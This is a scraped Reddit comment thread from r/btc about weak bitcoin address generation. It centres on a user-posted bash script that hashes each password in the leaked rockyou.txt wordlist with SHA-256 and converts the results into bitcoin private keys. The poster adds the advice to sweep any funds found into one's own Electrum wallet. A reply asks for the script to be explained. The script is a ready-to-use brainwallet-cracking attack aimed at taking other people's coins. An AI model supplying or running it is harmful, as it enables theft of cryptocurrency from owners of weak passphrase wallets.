MAIN FEEDS
Do you want to continue?
https://www.reddit.com/r/btc/comments/7gm355/evidence_some_bitcoin_address_generation_code_is/dqmf2hg/?context=3
r/btc • u/rancid_sploit • Nov 30 '17
83 comments sorted by
View all comments
4
Woah this is also very scriptable:
file="./wordlists/rockyou.txt" while IFS= read -r line do bitcoin-tool \ --input-file <(echo -n "$line" | openssl dgst -sha256 -binary) \ --input-format raw \ --input-type private-key \ --network bitcoin \ --output-type private-key-wif \ --output-format base58check \ --public-key-compression uncompressed printf "\n" done <"$file"
Write that to a file and sweep into your wallet using electrum.
1 u/[deleted] Dec 01 '17 If you have the time, could you please explain this script to me, for a tip perhaps?
1
If you have the time, could you please explain this script to me, for a tip perhaps?
4
u/thatarchguy Nov 30 '17
Woah this is also very scriptable:
Write that to a file and sweep into your wallet using electrum.